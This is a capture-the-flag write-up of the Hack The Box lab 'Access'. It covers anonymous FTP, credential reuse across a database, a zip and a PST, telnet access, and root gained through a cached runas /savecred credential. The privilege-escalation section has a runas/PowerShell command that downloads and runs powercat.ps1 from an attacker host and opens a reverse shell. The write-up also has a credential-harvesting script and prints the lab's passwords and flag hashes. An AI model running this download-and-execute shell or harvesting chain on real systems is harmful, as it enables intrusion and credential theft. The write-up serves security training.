HTB Access done
Access
OS:
Windows
Technology:
IP Address:
10.10.10.98
Open ports:
21/tcp open ftp Microsoft ftpd
23/tcp open telnet Microsoft Windows XP telnetd
80/tcp open http Microsoft IIS httpd 7.5
Users and passwords:
From file: backup.mdb (table auth_user)
L: admin
P: admin
---
L: engineer
P: access4u@security
---
L: backup_admin
P: admin
---
Password for file: Access_Control.zip (the engineer password, reused)
P: access4u@security
---
From file: Access Control.pst (valid for telnet)
L: security
P: 4Cc3ssC0ntr0ller
Nmap
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Access]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.10.10.98_nmap 10.10.10.98 ; cat 10.10.10.98_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-18 22:10 UTC
Nmap scan report for 10.10.10.98
Host is up (0.040s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.
23/tcp open telnet Microsoft Windows XP telnetd
|_telnet-ntlm-info: ERROR: Script execution failed (use -d to debug)
80/tcp open http Microsoft IIS httpd 7.5
|_http-title: MegaCorp
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
ffuf: http://10.10.10.98
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Access]
└─$ ffuf -u http://10.10.10.98/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o 10.10.10.98_ffuz -of all -e .php,.html,.txt,.bac,.backu,.asp,.aspx
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.10.98/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backu .asp .aspx
:: Output file : 10.10.10.98_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
Index.html [Status: 200, Size: 391, Words: 23, Lines: 15, Duration: 45ms]
aspnet_client [Status: 301, Size: 156, Words: 9, Lines: 2, Duration: 51ms]
[INFO] Adding a new job to the queue: http://10.10.10.98/aspnet_client/FUZZ
index.html [Status: 200, Size: 391, Words: 23, Lines: 15, Duration: 42ms]
[INFO] Starting queued job on target: http://10.10.10.98/aspnet_client/FUZZ
system_web [Status: 301, Size: 167, Words: 9, Lines: 2, Duration: 49ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.10.10.98/aspnet_client/system_web/
:: Progress: [163752/163752] :: Job [2/2] :: 873 req/sec :: Duration: [0:03:33] :: Errors: 0 ::
Download files from ftp (anonymous login; the server accepts any e-mail-style string as the password). Nmap's ftp-anon could not list the directory because PASV failed, so force active mode with -A:
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Access]
└─$ ftp -A ftp://anonymous:anonymous@10.10.10.98
Connected to 10.10.10.98.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
230 User logged in.
Remote system type is Windows_NT.
200 Type set to I.
ftp> dir
200 EPRT command successful.
125 Data connection already open; Transfer starting.
08-23-18 09:16PM <DIR> Backups
08-24-18 10:00PM <DIR> Engineer
226 Transfer complete.
ftp> cd Backups
250 CWD command successful.
ftp> ls -la
200 EPRT command successful.
125 Data connection already open; Transfer starting.
08-23-18 09:16PM 5652480 backup.mdb
226 Transfer complete.
ftp> get backup.mdb
local: backup.mdb remote: backup.mdb
200 EPRT command successful.
125 Data connection already open; Transfer starting.
100% |************************************************************************| 5520 KiB 924.11 KiB/s 00:00 ETA
226 Transfer complete.
5652480 bytes received in 00:05 (924.05 KiB/s)
ftp> cd ../Engineer
250 CWD command successful.
ftp> dir
200 EPRT command successful.
125 Data connection already open; Transfer starting.
08-24-18 01:16AM 10870 Access Control.zip
226 Transfer complete.
ftp> get Access\ Control.zip
local: Access Control.zip remote: Access Control.zip
200 EPRT command successful.
125 Data connection already open; Transfer starting.
100% |************************************************************************| 10870 64.59 KiB/s 00:00 ETA
226 Transfer complete.
10870 bytes received in 00:00 (64.46 KiB/s)
ftp> exit
221 Goodbye.
Cracking password for zip file: Access_Control.zip (the downloaded "Access Control.zip", renamed without the space). The archive is WinZip AES (PBKDF2-SHA1), so there is no shortcut; rockyou does not contain the password (0g after 8.5 minutes), and it turns up in backup.mdb instead:
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Access/ftp]
└─$ zip2john Access_Control.zip > Access_Control.john
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Access/ftp]
└─$ john Access_Control.john --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 128/128 SSE2 4x])
Cost 1 (HMAC size) is 10650 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:08:35 DONE (2024-08-19 13:28) 0g/s 27816p/s 27816c/s 27816C/s !Sketchy!..*7¡Vamos!
Session completed.
Open file: backup.mdb
Export the tables and look for an auth/user table. I opened it via the website https://www.mdbopener.com/ and downloaded the export as a zip file; on a real engagement do this offline instead (mdbtools on Kali: mdb-tables lists the tables, mdb-export dumps one as CSV) rather than uploading a client's backup to a third-party site.
---
┌──(kali㉿kali)-[~/…/HTB/HTB_Access/ftp/backup.mdb.zip_folder]
└─$ cat auth_user.csv
id,username,password,Status,last_login,RoleID,Remark
25,"admin","admin",1,"08/23/18 21:11:47",26,
27,"engineer","access4u@security",1,"08/23/18 21:13:36",26,
28,"backup_admin","admin",1,"08/23/18 21:14:02",26,
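auth_user is one table among many in backup.mdb, and the interesting rows were found by eye. As an added example (my code, not part of the original writeup and not mdbtools), the script below scans a directory of CSV exports such as mdb-export produces, flags every table that has a password-like column, and builds a candidate wordlist from the usernames and passwords it finds, for reuse against the zip, FTP or telnet. The two CSVs it writes to a temporary directory are constructed: auth_user mirrors the rows shown above, acc_door is a made-up table with no credentials.

```python
"""Scan CSV exports of an Access database for credential columns."""
import csv
import io
import os
import tempfile

# Column names that usually hold secrets, and the account column that goes with them.
PASSWORD_COLUMNS = ("password", "passwd", "pass", "pwd", "secret")
USERNAME_COLUMNS = ("username", "user", "login", "email")


def find_credentials(table_name: str, csv_text: str):
    """Return (table, username, password) for every row with a non-empty password column."""
    reader = csv.DictReader(io.StringIO(csv_text))
    if not reader.fieldnames:
        return []
    lowered = {name.lower(): name for name in reader.fieldnames}
    pw_col = next((lowered[c] for c in PASSWORD_COLUMNS if c in lowered), None)
    if pw_col is None:
        return []
    user_col = next((lowered[c] for c in USERNAME_COLUMNS if c in lowered), None)
    hits = []
    for row in reader:
        password = (row.get(pw_col) or "").strip()
        if password:
            user = (row.get(user_col) or "") if user_col else ""
            hits.append((table_name, user, password))
    return hits


def scan_directory(path: str):
    """Run find_credentials over every .csv in a directory (e.g. an mdb-export dump)."""
    hits = []
    for fname in sorted(os.listdir(path)):
        if fname.lower().endswith(".csv"):
            full = os.path.join(path, fname)
            with open(full, newline="", encoding="utf-8", errors="replace") as fh:
                hits.extend(find_credentials(fname[:-4], fh.read()))
    return hits


def candidate_wordlist(hits):
    """Unique usernames and passwords, in discovery order, for john --wordlist or spraying."""
    words = []
    for _, user, password in hits:
        for word in (user, password):
            if word and word not in words:
                words.append(word)
    return words


# Constructed sample exports: auth_user mirrors the rows recovered from backup.mdb,
# acc_door is an invented table without credential columns.
SAMPLE_TABLES = {
    "auth_user": (
        "id,username,password,Status,last_login,RoleID,Remark\n"
        '25,"admin","admin",1,"08/23/18 21:11:47",26,\n'
        '27,"engineer","access4u@security",1,"08/23/18 21:13:36",26,\n'
        '28,"backup_admin","admin",1,"08/23/18 21:14:02",26,\n'
    ),
    "acc_door": 'id,door_name,ip\n1,"Front door","192.0.2.10"\n',
}


def demo():
    """Write the constructed exports to a temp dir and scan them."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, text in SAMPLE_TABLES.items():
            with open(os.path.join(tmp, name + ".csv"), "w", encoding="utf-8") as fh:
                fh.write(text)
        return scan_directory(tmp)


if __name__ == "__main__":
    found = demo()
    for table, user, password in found:
        print(f"{table}: {user}:{password}")
    print("candidate wordlist:", candidate_wordlist(found))
```

Point it at the directory where you ran mdb-export for every table name from mdb-tables; the wordlist it returns is what you would feed to john instead of rockyou for a password that was never leaked publicly.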
Unzip archive: Access_Control.zip with the engineer password from the previous step
I use password: access4u@security (credential reuse between the database and the archive)
---
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Access/ftp]
└─$ 7z x Access_Control.zip
7-Zip 24.07 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-06-19
64-bit locale=en_US.UTF-8 Threads:4 OPEN_MAX:1024
Scanning the drive for archives:
1 file, 10870 bytes (11 KiB)
Extracting archive: Access_Control.zip
--
Path = Access_Control.zip
Type = zip
Physical Size = 10870
Would you like to replace the existing file:
Path: ./Access Control.pst
Size: 0 bytes
Modified: 2018-08-24 00:13:52
with the file from archive:
Path: Access Control.pst
Size: 271360 bytes (265 KiB)
Modified: 2018-08-24 00:13:52
? (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit? Y
Enter password (will not be echoed):
Everything is Ok
Size: 271360
Compressed: 10870
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Access/ftp]
└─$ ls
Access_Control.john Access_Control.zip backup.mdb.zip
'Access Control.pst' backup.mdb backup.mdb.zip_folder
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Access/ftp]
└─$ file Access\ Control.pst
Access Control.pst: Microsoft Outlook Personal Storage (>=2003, Unicode, version 23), dwReserved1=0x234, dwReserved2=0x22f3a, bidUnused=0000000000000000, dwUnique=0x39, 271360 bytes, bCryptMethod=1, CRC32 0x744a1e2e
Open file: Access Control.pst
The file is an Outlook mailbox (see the file output above); open it in Outlook or convert it offline with readpst from pst-utils/libpst, which writes each folder out as mbox. One mail announces a password change for the security account:
4Cc3ssC0ntr0ller
Read flag: user.txt (log in over telnet as security; telnet carries the credentials in cleartext, acceptable in a lab only)
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Access/ftp]
└─$ telnet 10.10.10.98
Trying 10.10.10.98...
Connected to 10.10.10.98.
Escape character is '^]'.
Welcome to Microsoft Telnet Service
login: security
password:
*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>cd Desktop
C:\Users\security\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 8164-DB5F
Directory of C:\Users\security\Desktop
08/28/2018 07:51 AM <DIR> .
08/28/2018 07:51 AM <DIR> ..
08/18/2024 10:45 PM 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 847,003,648 bytes free
C:\Users\security\Desktop>type user.txt
06549caadb5dda66df897628ca94db87
C:\Users\security\Desktop>whoami /all
USER INFORMATION
----------------
User Name SID
=============== ==========================================
access\security S-1-5-21-953262931-566350628-63446256-1001
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ========================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
ACCESS\TelnetClients Alias S-1-5-21-953262931-566350628-63446256-1000 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
C:\Users\security\Desktop>net user security
User name security
Full Name security
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 8/22/2018 10:14:57 PM
Password expires Never
Password changeable 8/22/2018 10:14:57 PM
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon 8/19/2024 2:59:25 PM
Logon hours allowed All
Local Group Memberships *TelnetClients *Users
Global Group memberships *None
The command completed successfully.
C:\Users\security\Desktop>ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IPv6 Address. . . . . . . . . . . : dead:beef::4db:8516:b9e6:5500
Link-local IPv6 Address . . . . . : fe80::4db:8516:b9e6:5500%11
IPv4 Address. . . . . . . . . . . : 10.10.10.98
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.10.10.2
Tunnel adapter isatap.{851F7B02-1B91-4636-BB2A-AAC45E5735BC}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
C:\Users\security\Desktop>
Privilege Escalation
The public desktop holds a shortcut, "C:\Users\Public\Desktop\ZKAccess3.5 Security System.lnk". Its command line starts the application through runas.exe with /savecred, which means the Administrator password was saved in Credential Manager when the shortcut was first used, and runas will reuse that cached credential for any command, without prompting, from the session of the user who saved it (here security). Check with cmdkey /list whether such a credential is present before relying on it.
runas.exe /user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"
---
C:\Users\Public\Desktop>type "ZKAccess3.5 Security System.lnk"
(binary .lnk output; only the readable strings are kept here)
C:\Windows\System32\runas.exe
..\..\..\Windows\System32\runas.exe
C:\ZKTeco\ZKAccess3.5
/user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"
C:\ZKTeco\ZKAccess3.5\img\AccessNET.ico
%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico
S-1-5-21-953262931-566350628-63446256-500 (RID 500: the built-in Administrator, matching whoami /all later)
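Rather than eyeballing type output, the .lnk can be parsed. The stray characters in the dump are the format itself: the "#" (0x23 = 35) before ..\..\..\Windows\System32\runas.exe and the "G" (0x47 = 71) before the /user: arguments are the CountCharacters prefixes of the StringData fields. The parser below is an added example (my code, written from the MS-SHLLINK layout; it is not from the writeup and not from ZKTeco): it validates the ShellLinkHeader, skips LinkTargetIDList and LinkInfo when their flags are set, decodes the StringData fields and flags a runas /savecred command line. SAMPLE_LNK is constructed by build_lnk to carry the same strings as the real shortcut; the IDList and LinkInfo that build_lnk emits are minimal placeholders that exercise the skip logic, not a resolvable target.

```python
"""Minimal parser for Windows Shell Link (.lnk) StringData, per MS-SHLLINK."""
import re
import struct

# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}

# StringData fields, in the order they appear on disk.
STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon"),
)


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields; LinkTargetIDList and LinkInfo are skipped when present."""
    if (len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    off = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:      # IDListSize (u16) followed by IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                # LinkInfoSize (u32) covers the whole structure
        off += struct.unpack_from("<I", data, off)[0]
    fields = {}
    for flag, key in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, off)[0]   # CountCharacters, no terminator
        off += 2
        if flags & IS_UNICODE:
            fields[key] = data[off:off + 2 * count].decode("utf-16-le")
            off += 2 * count
        else:
            fields[key] = data[off:off + count].decode("cp1252")
            off += count
    return fields   # ExtraData blocks after StringData are ignored


def savecred_user(fields: dict):
    """If the command line uses runas /savecred, return the account whose cached credential it reuses."""
    args = fields.get("arguments", "")
    if "/savecred" not in args.lower():
        return None
    m = re.search(r"/user:(\S+)", args, re.IGNORECASE)
    return m.group(1) if m else "<unknown>"


def build_lnk(strings: dict, unicode: bool = True, with_id_list: bool = True) -> bytes:
    """Constructed .lnk: header, placeholder IDList/LinkInfo (optional) and the given StringData."""
    flags = IS_UNICODE if unicode else 0
    for flag, key in STRING_FIELDS:
        if key in strings:
            flags |= flag
    body = b""
    if with_id_list:
        flags |= HAS_LINK_TARGET_ID_LIST | HAS_LINK_INFO
        body += struct.pack("<HH", 2, 0)                               # IDListSize=2, TerminalID
        body += struct.pack("<IIIIIII", 0x1C, 0x1C, 0, 0, 0, 0, 0)     # 28-byte LinkInfo, all offsets 0
    header = struct.pack("<I16sIIQQQIiIHHII", HEADER_SIZE, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)           # attrs, times, size, icon, SW_SHOWNORMAL
    for flag, key in STRING_FIELDS:
        if key in strings:
            s = strings[key]
            body += struct.pack("<H", len(s)) + (s.encode("utf-16-le") if unicode else s.encode("cp1252"))
    return header + body


# Constructed sample carrying the strings recovered from "ZKAccess3.5 Security System.lnk".
SAMPLE_LNK = build_lnk({
    "relative_path": r"..\..\..\Windows\System32\runas.exe",
    "working_dir": r"C:\ZKTeco\ZKAccess3.5",
    "arguments": r'/user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"',
    "icon": r"C:\ZKTeco\ZKAccess3.5\img\AccessNET.ico",
})

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_LNK
    fields = parse_lnk(data)
    for key, value in fields.items():
        print(f"{key:14} {value}")
    user = savecred_user(fields)
    if user:
        print(f"[!] runas /savecred as {user}: cached credential reusable from this user's session")
```

Run it with a .lnk path as the argument to parse a real shortcut pulled from the box; with no argument it parses the constructed sample.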
Create a revshell
Copy powercat.ps1
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Access]
└─$ cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 .
Start python webserver
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Access]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.98 - - [19/Aug/2024 23:00:42] "GET /powercat.ps1 HTTP/1.1" 200 -
Start a netcat listener on the attacker box first
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Access]
└─$ netcat -lvnp 443
listening on [any] 443 ...
Then trigger the reverse shell from the telnet session. runas reuses the cached Administrator credential (/savecred, so no password prompt) to launch PowerShell, which fetches powercat.ps1 from the web server and connects back
C:\Users\security>runas /user:ACCESS\Administrator /savecred "powershell iex(new-object net.webclient).downloadstring('http://10.10.14.25/powercat.ps1') ; powercat -c 10.10.14.25 -p 443 -e cmd"
connect to [10.10.14.25] from (UNKNOWN) [10.10.10.98] 49166
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
access\administrator
Read flag: root.txt
C:\Windows\system32>cd C:\Users
cd C:\Users
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is 8164-DB5F
Directory of C:\Users
08/21/2018 11:31 PM <DIR> .
08/21/2018 11:31 PM <DIR> ..
08/24/2018 12:46 AM <DIR> Administrator
07/14/2009 05:57 AM <DIR> Public
08/23/2018 11:52 PM <DIR> security
0 File(s) 0 bytes
5 Dir(s) 846,954,496 bytes free
C:\Users>cd Administrator\Desktop
cd Administrator\Desktop
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 8164-DB5F
Directory of C:\Users\Administrator\Desktop
07/14/2021 03:40 PM <DIR> .
07/14/2021 03:40 PM <DIR> ..
08/18/2024 10:45 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 846,954,496 bytes free
C:\Users\Administrator\Desktop>type root.txt
type root.txt
ca8bbaf3ffb640f259fdbf27139e1cc7
C:\Users\Administrator\Desktop>whoami /all
whoami /all
USER INFORMATION
----------------
User Name SID
==================== =========================================
access\administrator S-1-5-21-953262931-566350628-63446256-500
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
=============================== ========================================= ========
SeLockMemoryPrivilege Lock pages in memory Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeSecurityPrivilege Manage auditing and security log Disabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled
SeLoadDriverPrivilege Load and unload device drivers Disabled
SeSystemProfilePrivilege Profile system performance Disabled
SeSystemtimePrivilege Change the system time Disabled
SeProfileSingleProcessPrivilege Profile single process Disabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Disabled
SeCreatePagefilePrivilege Create a pagefile Disabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Disabled
SeUndockPrivilege Remove computer from docking station Disabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
SeCreateSymbolicLinkPrivilege Create symbolic links Disabled
C:\Users\Administrator\Desktop>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::4db:8516:b9e6:5500%11
IPv4 Address. . . . . . . . . . . : 10.10.10.98
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.10.10.2
Tunnel adapter isatap.{851F7B02-1B91-4636-BB2A-AAC45E5735BC}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
C:\Users\Administrator\Desktop>
Lessons Learned
Anonymous FTP exposed a database backup and an engineer's archive; every credential in the chain (mdb, zip, pst, telnet) came from files, not from an exploit.
Passwords were reused: the engineer's database password opened the zip, and the mail in the PST gave the telnet password for security.
runas /savecred leaves a cached Administrator credential that any command run from that user's session can reuse without a password; treat saved credentials as a privilege escalation path, not a convenience.
FTP and telnet carry credentials in cleartext; the cracking attempt with rockyou failed, the credential search through the backup succeeded.